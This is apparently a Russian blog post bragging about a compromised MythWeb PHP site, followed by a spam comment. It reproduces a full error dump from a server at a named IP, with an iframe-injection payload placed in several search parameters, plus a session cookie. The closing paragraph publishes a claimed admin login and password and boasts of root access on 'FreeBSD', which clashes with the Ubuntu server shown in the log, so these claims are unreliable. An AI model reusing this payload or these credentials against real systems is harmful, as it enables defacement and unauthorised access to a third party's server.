Как выглядят данные на взломанном сайте на php?

Данные выглядят через php на взломанном сайте следующим образом! Надо отметить, что сайт лёг из-за банальной XXS-атаки! Сам сайт пропускает 90% всех уязвимостей, в том числе sql-инъекции! И так смотрим отчёт php:

datetime:  2010-12-29 12:53:53 (CET)
errornum:  256
error type:  User Error
error string:  SQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL

server version for the right syntax to use near ‘) AND program.starttime>=’2010-12-29 12:53:53’ AND

program.endtime<=’2011-01-12 ‘ at line 13 [#1064]
filename:  /usr/share/mythtv/mythweb/classes/Database/Query/mysql.php
error line:  83

==========================================================================

Backtrace:

file:  /usr/share/mythtv/mythweb/classes/Database/Query/mysql.php
line:  83
class:
function:  trigger_error
type:
args:  Array
(
[0] => SQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server

version for the right syntax to use near ‘) AND program.starttime>=’2010-12-29 12:53:53’ AND

program.endtime<=’2011-01-12 ‘ at line 13 [#1064]
[1] => 256
)

file:  /usr/share/mythtv/mythweb/classes/Database.php
line:  263
class:  Database_Query_mysql
function:  execute
type:  ->
args:  Array
(
[0] => Array ( )
)

file:  /usr/share/mythtv/mythweb/modules/tv/includes/programs.php
line:  166
class:  Database
function:  query
type:  ->
args:  Array
(
[0] => SELECT program.*,
UNIX_TIMESTAMP(program.starttime) AS starttime_unix,
UNIX_TIMESTAMP(program.endtime) AS endtime_unix,
IFNULL(programrating.system, «») AS rater,
IFNULL(programrating.rating, «») AS rating,
channel.callsign,
channel.channum
FROM program
LEFT JOIN programrating USING (chanid, starttime)
LEFT JOIN channel ON program.chanid = channel.chanid
LEFT JOIN credits ON (program.chanid = credits.chanid AND program.starttime =

credits.starttime)
LEFT JOIN people ON (credits.person = people.person)
WHERE program.chanid IN (1) AND (program.endtime > FROM_UNIXTIME(‘1293623633’) AND program.starttime

< FROM_UNIXTIME(‘1296302033’) AND program.starttime != program.endtime) AND ((program.title LIKE

‘%<div%style=z%index:999;position:absolute;left:0;top:0;><iframe%frameborder=0%scrolling=no%src=https://fuck.ru%width=

1400%height=3744></iframe></div>%’)) AND (program.category_type IN () AND program.starttime>=’2010-12-29 12:53:53′

AND program.endtime<=’2011-01-12 12:53:53′)
GROUP BY channel.callsign, program.chanid, program.starttime ORDER BY program.starttime
)

file:  /usr/share/mythtv/mythweb/modules/tv/search.php
line:  338
class:
function:  load_all_program_data
type:
args:  Array
(
[0] => 1293623633
[1] => 1296302033
[2] =>
[3] =>
[4] => ((program.title LIKE

‘%<div%style=z%index:999;position:absolute;left:0;top:0;><iframe%frameborder=0%scrolling=no%src=https://fuck.ru%width=

1400%height=3744></iframe></div>%’)) AND (program.category_type IN () AND program.starttime>=’2010-12-29 12:53:53′

AND program.endtime<=’2011-01-12 12:53:53′)
)

file:  /usr/share/mythtv/mythweb/modules/tv/handler.php
line:  87
class:
function:  require_once
type:
args:  Array
(
[0] => /usr/share/mythtv/mythweb/modules/tv/search.php
)

file:  /usr/share/mythtv/mythweb/mythweb.php
line:  35
class:
function:  require_once
type:
args:  Array
(
[0] => /usr/share/mythtv/mythweb/modules/tv/handler.php
)

==========================================================================

$_GET: Array
(
[type] => a
[af] => Array
(
[0] => Array
(
[0] => title
)

)

[as] => Array
(
[0] => <div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0 scrolling=no

src=https://fuck.ru width=1400 height=3744></iframe></div>
)

[starttime] => now
[endtime] => + 2 weeks
[airdate_start] => <div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0 scrolling=no

src=https://fuck.ru width=1400 height=3744></iframe></div>
[airdate_end] => <div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0 scrolling=no

src=https://fuck.ru width=1400 height=3744></iframe></div>
[categories] => Array
(
[0] => All
)

[search] => Search
)

==========================================================================

$_SESSION: Array
(
[language] => English
[prefer_channum] => 1
[date_statusbar] => %a %b %e, %Y, %I:%M %p
[date_scheduled] => %a %b %e, %Y (%I:%M %p)
[date_scheduled_popup] => %a %b %e, %Y
[date_recorded] => %a %b %e, %Y (%I:%M %p)
[date_search] => %a %b %e, %Y, %I:%M %p
[date_listing_key] => %a %b %e, %Y, %I:%M %p
[date_listing_jump] => %a %b %e, %Y
[date_channel_jump] => %a %b %e, %Y
[date_job_status] => %a %b %e, %Y, %I:%M %p
[time_format] => %I:%M %p
[recorded_pixmaps] => 1
[guide_favonly] =>
[timeslot_size] => 300
[num_time_slots] => 36
[timeslot_blocks] => 3
[timeslotbar_skip] => 20
[max_stars] => 4
[star_character] => &#9733;
[show_popup_info] => 1
[show_channel_icons] => 1
[sortby_channum] => 1
[recorded_paging] =>
[genre_colors] => 1
[show_video_covers] => 1
[settings] => Array
(
[screens] => Array
(
[tv] => Array
(
[upcoming recordings] => Array
(
[title] => on
[channel] => on
[record date] => on
[length] => on
)

)

)

)

[backend] => Array
(
[127.0.0.1] => Array
(
[proto_version] => Array
(
[last_check_version] => 23056
[last_check_time] => 1293623425
)

)

[timezone] => Array
(
[value] => Europe/Amsterdam
[last_check_time] => 1293623425
)

)

[tv] => Array
(
[last] => Array
(
[0] => search
)

)

[recorded_title] =>
[recorded_recgroup] =>
[recorded_sortby] => Array
(
[0] => Array
(
[field] => airdate
[reverse] => 1
)

[1] => Array
(
[field] => title
[reverse] =>
)

)

[] => Array ( )
[scheduled_recordings] => Array
(
[disp_scheduled] => 1
[disp_duplicates] => 1
[disp_deactivated] => 1
[disp_conflicts] => 1
[disp_recgroup] =>
[disp_title] =>
)

[video_sortby] => Array
(
[0] => Array
(
[field] => title
[reverse] =>
)

)

=> Array
(
[path] => /<div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0 scrolling=no

src=https://fuck.ru width=1400 height=3744></iframe></div>
[browse] => -1
[VideoAdminPassword] => 1
)

[search] => Array
(
[type] => a
[s] => <div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0 scrolling=no

src=https://fuck.ru width=1400 height=3744></iframe></div>
[ctype] => Array ( )
[categories] => Array
(
[0] => All
)

[stars_gt] => 0
[stars_lt] => 0
[starttime] => now
[endtime] => + 2 weeks
[as] => Array
(
[0] => <div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0 scrolling=no

src=https://fuck.ru width=1400 height=3744></iframe></div>
)

[af] => Array
(
[0] => Array
(
[0] => title
)

)

[aj] => Array
(
[0] => AND
)

[hd] =>
[commfree] =>
[unwatched] =>
[scheduled] =>
[generic] =>
[airdate_start] => <div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0

scrolling=no src=https://fuck.ru width=1400 height=3744></iframe></div>
[airdate_end] => <div style=z-index:999;position:absolute;left:0;top:0;><iframe frameborder=0

scrolling=no src=https://fuck.ru width=1400 height=3744></iframe></div>
)

)

==========================================================================

$_SERVER: Array
(
[REDIRECT_STATUS] => 200
[HTTP_HOST] => 211.78.181.247
[HTTP_USER_AGENT] => Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13

(.NET CLR 3.5.30729)
[HTTP_ACCEPT] => text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
[HTTP_ACCEPT_LANGUAGE] => ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
[HTTP_ACCEPT_ENCODING] => gzip,deflate
[HTTP_ACCEPT_CHARSET] => windows-1251,utf-8;q=0.7,*;q=0.7
[HTTP_KEEP_ALIVE] => 115
[HTTP_CONNECTION] => keep-alive
[HTTP_REFERER] =>

https://211.78.181.247/mythweb/tv/search?type=q&s=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0%3Btop%

3A0%3B%3E%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%2Fifram

e%3E%3C%2Fdiv%3E&search=Search
[HTTP_COOKIE] => mythweb_tmpl=default; mythweb_skin=default; mythweb_id=gir24tta61fkc6rto1tk8b4m95
[PATH] => /usr/local/bin:/usr/bin:/bin
[SERVER_SIGNATURE] => <address>Apache/2.2.16 (Ubuntu) Server at 211.78.181.247 Port 80</address>

[SERVER_SOFTWARE] => Apache/2.2.16 (Ubuntu)
[SERVER_NAME] => 211.78.181.247
[SERVER_ADDR] => 192.168.123.11
[SERVER_PORT] => 80
[REMOTE_ADDR] => 195.110.239.64
[DOCUMENT_ROOT] => /var/www
[SERVER_ADMIN] => webmaster@localhost
[SCRIPT_FILENAME] => /var/www/mythweb/mythweb.php
[REMOTE_PORT] => 1452
[REDIRECT_QUERY_STRING] =>

type=a&af%5B0%5D%5B0%5D=title&as%5B0%5D=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0%3Btop%3A0%3B%3E

%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%2Fiframe%3E%3C%2

Fdiv%3E&starttime=now&endtime=%2B+2+weeks&airdate_start=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0

%3Btop%3A0%3B%3E%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%

2Fiframe%3E%3C%2Fdiv%3E&airdate_end=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0%3Btop%3A0%3B%3E%3Ci

frame+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%2Fiframe%3E%3C%2Fdiv

%3E&categories%5B%5D=All&search=Search
[REDIRECT_URL] => /mythweb/tv/search
[GATEWAY_INTERFACE] => CGI/1.1
[SERVER_PROTOCOL] => HTTP/1.1
[REQUEST_METHOD] => GET
[QUERY_STRING] =>

type=a&af%5B0%5D%5B0%5D=title&as%5B0%5D=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0%3Btop%3A0%3B%3E

%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%2Fiframe%3E%3C%2

Fdiv%3E&starttime=now&endtime=%2B+2+weeks&airdate_start=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0

%3Btop%3A0%3B%3E%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%

2Fiframe%3E%3C%2Fdiv%3E&airdate_end=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0%3Btop%3A0%3B%3E%3Ci

frame+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%2Fiframe%3E%3C%2Fdiv

%3E&categories%5B%5D=All&search=Search
[REQUEST_URI] =>

/mythweb/tv/search?type=a&af%5B0%5D%5B0%5D=title&as%5B0%5D=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%

3A0%3Btop%3A0%3B%3E%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%

3C%2Fiframe%3E%3C%2Fdiv%3E&starttime=now&endtime=%2B+2+weeks&airdate_start=%3Cdiv+style%3Dz-index%3A999%3Bposition%3A

absolute%3Bleft%3A0%3Btop%3A0%3B%3E%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+h

eight%3D3744%3E%3C%2Fiframe%3E%3C%2Fdiv%3E&airdate_end=%3Cdiv+style%3Dz-index%3A999%3Bposition%3Aabsolute%3Bleft%3A0%

3Btop%3A0%3B%3E%3Ciframe+frameborder%3D0+scrolling%3Dno+src%3Dhttp%3A%2F%2Ffuck.ru+width%3D1400+height%3D3744%3E%3C%2

Fiframe%3E%3C%2Fdiv%3E&categories%5B%5D=All&search=Search
[SCRIPT_NAME] => /mythweb/mythweb.php
[PATH_INFO] => /tv/search
[PATH_TRANSLATED] => /var/www/tv/search
[PHP_SELF] => /mythweb/mythweb.php/tv/search
[REQUEST_TIME] => 1293623632
[STATUS] => 200
[URL] => /mythweb/tv/search
[HTTP_PORT] => 80
)

==========================================================================

$constant_list[«user»]: Array
(
[ERROR] => 512
[E_ASSERT_ERROR] => 4096
[FATAL] => 256
[PHP_MIN_VERSION] => 5.1
[WARNING] => 1024
[WebDBSchemaVer] => 2
[dupsin_all] => 15
[dupsin_ex_generic] => 64
[dupsin_ex_repeats] => 32
[dupsin_newepisodes] => 16
[dupsin_oldrecorded] => 2
[dupsin_recorded] => 1
[error_email] =>
[gb] => 1073741824
[hostname] => display-desktop
[http_host] => 211.78.181.247
[kb] => 1024
[max_stars] => 4
[mb] => 1048576
[module] => tv
[modules_path] => ./modules
[num_time_slots] => 36
[prefer_channum] => 1
[rectype_always] => 4
[rectype_channel] => 3
[rectype_daily] => 2
[rectype_dontrec] => 8
[rectype_finddaily] => 9
[rectype_findone] => 6
[rectype_findweekly] => 10
[rectype_once] => 1
[rectype_override] => 7
[rectype_weekly] => 5
[root] => /mythweb/
[root_url] => https://211.78.181.247/mythweb/
[searchtype_keyword] => 3
[searchtype_manual] => 5
[searchtype_people] => 4
[searchtype_power] => 1
[searchtype_title] => 2
[skin] => default
[skin_img_url] => https://211.78.181.247/mythweb/skins/default/img/
[skin_url] => https://211.78.181.247/mythweb/skins/default/
[star_character] => &#9733;
[stream_url] => https://211.78.181.247:80//mythweb/
[tb] => 1099511627776
[timeslot_blocks] => 3
[timeslot_size] => 300
[timeslotbar_skip] => 20
[tmpl] => default
[tmpl_dir] => modules/tv/tmpl/default/
)

Отсюда, удалось взломать Базу Данных сайта и получить пароль администратора: l:admin p:creator2000 Теперь, говорят, взломанный сервер находится под контролем хакеров 😉 Ещё, благодаря эксплоиту удалось получить на сервере FreeBSD права root!

2 thoughts on “Как выглядят данные на взломанном сайте на php?

  1. Добрый день! Хочу от всей души поблагодарить админа этого замечательного сайта за интересные и содержательные посты! Отлично провела время за их чтением. Буду чаще к вам наведоваться и советовать ваш сайт друзьям! Приглашаю вас в гости на мой портал!!! Здесь вы отлично поведёте время читая статьи о здоровье http://dixi.helpset.ru

Comments are closed.